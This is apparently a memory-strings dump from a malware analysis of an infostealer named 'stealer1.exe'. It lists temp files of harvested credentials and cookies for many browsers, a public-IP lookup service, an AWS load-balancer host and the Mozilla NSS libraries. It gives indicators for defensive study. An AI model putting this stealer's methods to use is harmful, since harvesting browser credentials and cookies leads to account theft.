- 0x3d0d00 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3d0f18 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x3d13e8 (6): zxGj`P
- 0x3d17d0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3d19e8 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d1c00 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d1e18 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d2030 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d2248 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x3d3b08 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3d4550 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4778 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d49a0 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4bc8 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4df0 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5018 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5240 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5468 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5690 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d58b8 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5ae0 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5d08 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5f30 (39): C:\Users\A\AppData\Local\Temp\Opera.txt
- 0x3d6158 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d6380 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d65a8 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d67d0 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d69f8 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d6c20 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d6e48 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d7070 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d7298 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d74c0 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d76e8 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d7910 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d7b38 (42): C:\Users\A\AppData\Local\Temp\Maxthon5.txt
- 0x3d7d60 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d7f88 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d81b0 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d8550 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d8778 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d89a0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d8bc8 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d8df0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d9018 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9240 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9468 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9690 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d98b8 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9ae0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9d08 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9f30 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3da158 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da380 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da5a8 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da7d0 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da9f8 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x3dac20 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x3dae48 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db070 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db298 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db4c0 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db6e8 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3db910 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbb38 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbd60 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbf88 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc1b0 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc550 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc778 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc9a0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dcbc8 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dcdf0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dd018 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dd240 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd468 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd690 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd8b8 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3ddae0 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3ddd08 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3ddf30 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3de158 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3de380 (47): C:\Users\A\AppData\Local\Temp\Opera_Cookies.txt
- 0x3de5a8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3de7d0 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3de9f8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3dec20 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3dee48 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df070 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df298 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df4c0 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df6e8 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3df910 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dfb38 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dfd60 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dff88 (50): C:\Users\A\AppData\Local\Temp\Maxthon5_Cookies.txt
- 0x3e01b0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x3e051e (82): 8C:\Users\A\AppData\Local\Temp\result.txt
- 0x3e0572 (16): hawk.exe
- 0x460e80 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x460e9f (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x460ec2 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x460f08 (44): les(x86)=C:\Program Files (x86)\Common Files
- 0x460f35 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x460f66 (14): COMPUTERNAME=O
- 0x460f75 (11): ComSpec=C:\
- 0x460f99 (19): FP_NO_HOST_CHECK=NO
- 0x460fad (12): HOMEDRIVE=C:
- 0x460fba (17): HOMEPATH=\Users\A
- 0x460fcc (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x460ff2 (15): LOGONSERVER=\\O
- 0x461002 (6): MpConf
- 0x461018 (47): aPath=C:\ProgramData\Microsoft\Windows Defender
- 0x461048 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x46106d (35): MpConfig_ProductPath=C:\Program Fil
- 0x461107 (17): vngGUID=8C765C2A-
- 0x461128 (11): 2E8D7028CEB
- 0x461134 (22): NUMBER_OF_PROCESSORS=4
- 0x46114b (13): OS=Windows_NT
- 0x461159 (71): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Window
- 0x4611b0 (74): ndows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x4611fb (45): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JS
- 0x461239 (26): PROCESSOR_ARCHITECTURE=x86
- 0x461254 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x461271 (63): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, Gen
- 0x46134c (29): ProgramW6432=C:\Program Files
- 0x46136a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x4613ab (13): PUBLIC=C:\Use
- 0x4613c8 (13): NNAME=Console
- 0x4613d6 (14): SystemDrive=C:
- 0x4613e5 (21): SystemRoot=C:\Windows
- 0x4613fb (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x46141e (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x461450 (7): RNAME=A
- 0x461458 (22): USERPROFILE=C:\Users\A
- 0x46146f (17): windir=C:\Windows
- 0x461481 (23): windows_tracing_flags=3
- 0x461499 (47): windows_tracing_logfile=C:\BVTBin\Tests\install
- 0x4614d8 (6): le.log
- 0x461566 (26):
- 0x4615e4 (24):
- 0x4615fd (8):
- 0x461646 (26): abcdefghijklmnopqrstuvwxyz
- 0x461666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x4617c0 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x4617df (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x461802 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x461839 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x461875 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x4618a6 (14): COMPUTERNAME=O
- 0x4618b5 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x4618d9 (19): FP_NO_HOST_CHECK=NO
- 0x4618ed (12): HOMEDRIVE=C:
- 0x4618fa (17): HOMEPATH=\Users\A
- 0x46190c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x461932 (15): LOGONSERVER=\\O
- 0x461942 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x461988 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x4619ad (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x4619e4 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x461a38 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x461a74 (22): NUMBER_OF_PROCESSORS=4
- 0x461a8b (13): OS=Windows_NT
- 0x461a99 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x461b3b (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x461b79 (26): PROCESSOR_ARCHITECTURE=x86
- 0x461b94 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x461bb1 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x461bfa (17): PROCESSOR_LEVEL=6
- 0x461c0c (23): PROCESSOR_REVISION=9e09
- 0x461c24 (26): ProgramData=C:\ProgramData
- 0x461c3f (35): ProgramFiles=C:\Program Files (x86)
- 0x461c63 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x461c8c (29): ProgramW6432=C:\Program Files
- 0x461caa (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x461ceb (22): PUBLIC=C:\Users\Public
- 0x461d02 (19): SESSIONNAME=Console
- 0x461d16 (14): SystemDrive=C:
- 0x461d25 (21): SystemRoot=C:\Windows
- 0x461d3b (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x461d5e (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x461d80 (12): USERDOMAIN=O
- 0x461d8d (10): USERNAME=A
- 0x461d98 (22): USERPROFILE=C:\Users\A
- 0x461daf (17): windir=C:\Windows
- 0x461dc1 (23): windows_tracing_flags=3
- 0x461dd9 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x461eb1 (15): )%w )%w@)%w`)%w
- 0x461ed1 (15): *%w *%w@*%w`*%w
- 0x461ef1 (15): +%w +%w@+%w`+%w
- 0x8b09f8 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x8b0a17 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x8b0a3a (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x8b0a71 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x8b0aad (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x8b0ade (14): COMPUTERNAME=O
- 0x8b0aed (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x8b0b11 (19): FP_NO_HOST_CHECK=NO
- 0x8b0b25 (12): HOMEDRIVE=C:
- 0x8b0b32 (17): HOMEPATH=\Users\A
- 0x8b0b44 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x8b0b6a (15): LOGONSERVER=\\O
- 0x8b0b7a (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x8b0bc0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x8b0be5 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x8b0c1c (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x8b0c70 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x8b0cac (22): NUMBER_OF_PROCESSORS=4
- 0x8b0cc3 (13): OS=Windows_NT
- 0x8b0cd1 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x8b0d73 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x8b0db1 (26): PROCESSOR_ARCHITECTURE=x86
- 0x8b0dcc (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x8b0de9 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x8b0e32 (17): PROCESSOR_LEVEL=6
- 0x8b0e44 (23): PROCESSOR_REVISION=9e09
- 0x8b0e5c (26): ProgramData=C:\ProgramData
- 0x8b0e77 (35): ProgramFiles=C:\Program Files (x86)
- 0x8b0e9b (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x8b0ec4 (29): ProgramW6432=C:\Program Files
- 0x8b0ee2 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x8b0f23 (22): PUBLIC=C:\Users\Public
- 0x8b0f3a (19): SESSIONNAME=Console
- 0x8b0f4e (14): SystemDrive=C:
- 0x8b0f5d (21): SystemRoot=C:\Windows
- 0x8b0f73 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x8b0f96 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x8b0fb8 (12): USERDOMAIN=O
- 0x8b0fc5 (10): USERNAME=A
- 0x8b0fd0 (22): USERPROFILE=C:\Users\A
- 0x8b0fe7 (17): windir=C:\Windows
- 0x8b0ff9 (23): windows_tracing_flags=3
- 0x8b1011 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x8b1566 (26):
- 0x8b15e4 (24):
- 0x8b15fd (8):
- 0x8b1646 (26): abcdefghijklmnopqrstuvwxyz
- 0x8b1666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x8b1718 (31): C:\Users\A\Desktop\stealer1.exe
- 0x8b1850 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x8b186f (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x8b1892 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x8b18c9 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x8b1905 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x8b1936 (14): COMPUTERNAME=O
- 0x8b1945 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x8b1969 (19): FP_NO_HOST_CHECK=NO
- 0x8b197d (12): HOMEDRIVE=C:
- 0x8b198a (17): HOMEPATH=\Users\A
- 0x8b199c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x8b19c2 (15): LOGONSERVER=\\O
- 0x8b19d2 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x8b1a18 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x8b1a3d (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x8b1a74 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x8b1ac8 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x8b1b04 (22): NUMBER_OF_PROCESSORS=4
- 0x8b1b1b (13): OS=Windows_NT
- 0x8b1b29 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x8b1bcb (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x8b1c09 (26): PROCESSOR_ARCHITECTURE=x86
- 0x8b1c24 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x8b1c41 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x8b1c8a (17): PROCESSOR_LEVEL=6
- 0x8b1c9c (23): PROCESSOR_REVISION=9e09
- 0x8b1cb4 (26): ProgramData=C:\ProgramData
- 0x8b1ccf (35): ProgramFiles=C:\Program Files (x86)
- 0x8b1cf3 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x8b1d1c (29): ProgramW6432=C:\Program Files
- 0x8b1d3a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x8b1d7b (22): PUBLIC=C:\Users\Public
- 0x8b1d92 (19): SESSIONNAME=Console
- 0x8b1da6 (14): SystemDrive=C:
- 0x8b1db5 (21): SystemRoot=C:\Windows
- 0x8b1dcb (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x8b1dee (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x8b1e10 (12): USERDOMAIN=O
- 0x8b1e1d (10): USERNAME=A
- 0x8b1e28 (22): USERPROFILE=C:\Users\A
- 0x8b1e3f (17): windir=C:\Windows
- 0x8b1e51 (23): windows_tracing_flags=3
- 0x8b1e69 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x8b1eb9 (15): e,t0e,tPe,tpe,t
- 0x8b1ed9 (15): f,t0f,tPf,tpf,t
- 0x8b1ef9 (15): g,t0g,tPg,tpg,t
- 0x9008c0 (64): C:\Windows\System32\fwpuclnt.dll
- 0x900998 (84): @%SystemRoot%\System32\wshtcpip.dll,-60100
- 0x900b9c (66): %SystemRoot%\system32\mswsock.dll
- 0x900e38 (84): @%SystemRoot%\System32\wshtcpip.dll,-60101
- 0x90103c (66): %SystemRoot%\system32\mswsock.dll
- 0x9012d8 (84): @%SystemRoot%\System32\wshtcpip.dll,-60102
- 0x9014dc (66): %SystemRoot%\system32\mswsock.dll
- 0x901778 (80): @%SystemRoot%\System32\wship6.dll,-60100
- 0x90197c (66): %SystemRoot%\system32\mswsock.dll
- 0x901c18 (80): @%SystemRoot%\System32\wship6.dll,-60101
- 0x901e1c (66): %SystemRoot%\system32\mswsock.dll
- 0x9020b8 (80): @%SystemRoot%\System32\wship6.dll,-60102
- 0x9022bc (66): %SystemRoot%\system32\mswsock.dll
- 0x902558 (76): @%SystemRoot%\System32\wshqos.dll,-100
- 0x90275c (66): %SystemRoot%\system32\mswsock.dll
- 0x9029f8 (76): @%SystemRoot%\System32\wshqos.dll,-101
- 0x902bfc (66): %SystemRoot%\system32\mswsock.dll
- 0x902e98 (76): @%SystemRoot%\System32\wshqos.dll,-102
- 0x90309c (66): %SystemRoot%\system32\mswsock.dll
- 0x903338 (76): @%SystemRoot%\System32\wshqos.dll,-103
- 0x90353c (66): %SystemRoot%\system32\mswsock.dll
- 0x903788 (64): %SystemRoot%\system32\NLAapi.dll
- 0x9038c8 (76): @%SystemRoot%\System32\wshqos.dll,-103
- 0x9039a0 (78): @%SystemRoot%\system32\nlasvc.dll,-1000
- 0x903a30 (66): %SystemRoot%\system32\napinsp.dll
- 0x903c48 (80): @%SystemRoot%\system32\napinsp.dll,-1000
- 0x903ce0 (66): %SystemRoot%\system32\pnrpnsp.dll
- 0x903ef8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1000
- 0x903fa0 (66): %SystemRoot%\system32\pnrpnsp.dll
- 0x9041b8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1001
- 0x904260 (66): %SystemRoot%\System32\mswsock.dll
- 0x904478 (84): @%SystemRoot%\system32\wshtcpip.dll,-60103
- 0x904520 (64): %SystemRoot%\System32\winrnr.dll
- 0x904a98 (40): MSAFD Tcpip [TCP/IP]
- 0x904b60 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
- 0x904bc8 (26): api.ipify.org
- 0x904ca0 (40): MSAFD Tcpip [UDP/IP]
- 0x904ea8 (40): MSAFD Tcpip [RAW/IP]
- 0x9050b0 (44): MSAFD Tcpip [TCP/IPv6]
- 0x9052b8 (44): MSAFD Tcpip [UDP/IPv6]
- 0x9054c0 (44): MSAFD Tcpip [RAW/IPv6]
- 0x9056c8 (54): RSVP TCPv6 Service Provider
- 0x9058d0 (50): RSVP TCP Service Provider
- 0x905ad8 (54): RSVP UDPv6 Service Provider
- 0x905ce0 (50): RSVP UDP Service Provider
- 0x9d3498 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0x9d34ec (18): stealer1.exe[2956]
- 0x9d3500 (15): CurrentThreadID
- 0x9d3515 (11):
- NotifyType
- 0x9d3524 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9d3555 (14):
- RemoteAddress
- 0x9d3567 (12): SocketHandle
- 0x9d357a (12): LocalAddress
- 0x9d358a (14): DLLNotifyEvent
- 0x9d359b (14):
- ConnectHandle
- 0x9d35b0 (15): Socket_IsSecure
- 0x9d35c2 (15): Socket_DataSize
- 0x9d35d8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9d3606 (15): RequestComplete
- 0x9d361c (15): ReceiveLastByte
- 0x9d3631 (14):
- SendFirstByte
- 0x9d3646 (14): DNSLookUpStart
- 0x9d365b (16): ReceiveFirstByte
- 0x9d3672 (12): SendLastByte
- 0x9d3684 (10): StartTick
- 0x9d3695 (12): ConnectStart
- 0x9d36a9 (12): qh.MemStream
- 0x9d36b6 (6): Z*s5C[
- 0x9d3759 (6): ^jszM"
- 0x9d37d2 (7): XDDfs:O
- 0x9d3a0b (6): 7b0G2N
- 0x9da6c8 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0x9da71c (18): stealer1.exe[2956]
- 0x9da730 (15): CurrentThreadID
- 0x9da745 (11):
- NotifyType
- 0x9da754 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9da785 (14):
- RemoteAddress
- 0x9da7aa (12): LocalAddress
- 0x9da7ba (14): DLLNotifyEvent
- 0x9da7cb (14):
- ConnectHandle
- 0x9da7e0 (15): Socket_IsSecure
- 0x9da7f2 (15): Socket_DataSize
- 0x9da808 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9da836 (15): RequestComplete
- 0x9da84c (15): ReceiveLastByte
- 0x9da861 (14):
- SendFirstByte
- 0x9da876 (14): DNSLookUpStart
- 0x9da88b (16): ReceiveFirstByte
- 0x9da8a2 (12): SendLastByte
- 0x9da8b4 (10): StartTick
- 0x9da8c5 (12): ConnectStart
- 0x9da8d9 (12): qh.MemStream
- 0x9db2a8 (7): imeTick
- 0x9db2ba (11): RequestGUID
- 0x9db2c6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0x9db2ef (11): ProcessName
- 0x9db2fc (18): stealer1.exe[2956]
- 0x9db310 (15): CurrentThreadID
- 0x9db325 (11):
- NotifyType
- 0x9db334 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9db365 (14):
- RemoteAddress
- 0x9db377 (12): SocketHandle
- 0x9db38a (12): LocalAddress
- 0x9db39a (14): DLLNotifyEvent
- 0x9db3ab (14):
- ConnectHandle
- 0x9db3c0 (15): Socket_IsSecure
- 0x9db3d2 (15): Socket_DataSize
- 0x9db3e8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9db416 (15): RequestComplete
- 0x9db42c (15): ReceiveLastByte
- 0x9db441 (14):
- SendFirstByte
- 0x9db456 (14): DNSLookUpStart
- 0x9db46b (16): ReceiveFirstByte
- 0x9db482 (12): SendLastByte
- 0x9db494 (10): StartTick
- 0x9db4a5 (12): ConnectStart
- 0x9db4b9 (12): qh.MemStream
- 0x9db97d (7): 8705OD&
- 0x9dbc92 (9): J/rua]lE!
- 0x9dbdcd (6): sdPtDn
- 0x9dc250 (6): Mm*,kZ
- 0x9dc3de (6): "%[QQ
- 0x9dc440 (6): @q/ir?
- 0x9dc6e3 (6): jXrN
- W
- 0x9dc834 (7): Zu>=fuU
- 0x9dc87d (7): 7KI%hHL
- 0x9dc936 (7): P4/q
- =
- 0x9dd08c (7): ]}^O\r5
- 0x9dd099 (6): h$d_M]
- 0x9dd176 (6): indFYS
- 0x9dd373 (6): Tv>@Md
- 0x9dd486 (7): S#$cb6?
- 0x9dd5e9 (6): cBt#A4
- 0x9dd7c6 (6): wuu|Q7
- 0x9dd875 (8): E=K}jgwc
- 0x9ddb18 (6): -<gQBy
- 0x9ddb87 (9): !&NWiq$&
- 0x9ddeba (6): M<J,a|
- 0x9de096 (9): WN!ybu $h
- 0x9de0d9 (6): Y#F2:k
- 0x9de20a (8): _iC)Yk<>
- 0x9de78b (6): 93
- 1%1
- 0x9de8a7 (6): ,/,DWO
- 0x9ded6b (7): ^?b5rCq
- 0x9df1b2 (6): #:]KT;
- 0x9df2df (7): uOhm'ah
- 0x9df36e (7): x4#fFql
- 0x9df42b (6): w4lR[~
- 0x9e25f8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24296
- 0x9e4cf8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $7574129d
- 0x9e9928 (100): NamedBuffer, mAH, Process $00000b8c, API $76d24296
- 0x9ec028 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24406
- 0x9f0158 (100): NamedBuffer, mAH, Process $00000b8c, API $76d26f01
- 0x9f79b0 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0xa05ae8 (100): NamedBuffer, mix, Process $00000b8c, API $76d26f01
- 0xa1b6d8 (38): \RPC Control\mchIpcHttpAnalyzer_StdV71
- 0xa1b738 (37): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0xa1b75e (38): HttpAnalyzer_StdV71
- 0xa227ac (7): -VkTJ)<
- 0xa2283f (7): INlV9QC
- 0xa22af9 (7): 9#(|F^9
- 0xa22ba4 (7): gkI_K5F
- 0xa22d30 (7): PZ(h9}
- 0xa22edc (6): IZN|;n
- 0xa2312d (8): 2R/D\RV4
- 0xa2327c (6): Doc6NZ
- 0xa2391d (6): cICTSO
- 0xa23c13 (7): _].w<:
- 0xa23caa (6): {ZC -Y
- 0xa23e1c (6): {\^
- R
- 0xa23fcb (7): HA7??oM
- 0xa2417e (7): jstY4#:
- 0xa242b2 (6): s"d5#Z
- 0xa24752 (7): +XMQr$)
- 0xa2481b (8): {vS]\7h,
- 0xa24948 (8): V^Rihet^
- 0xa24b59 (6): @tC_V$
- 0xa24f23 (12): freebl3.dll
- 0xa24f80 (12): mozglue.dll
- 0xa24fdd (9): nss3.dll
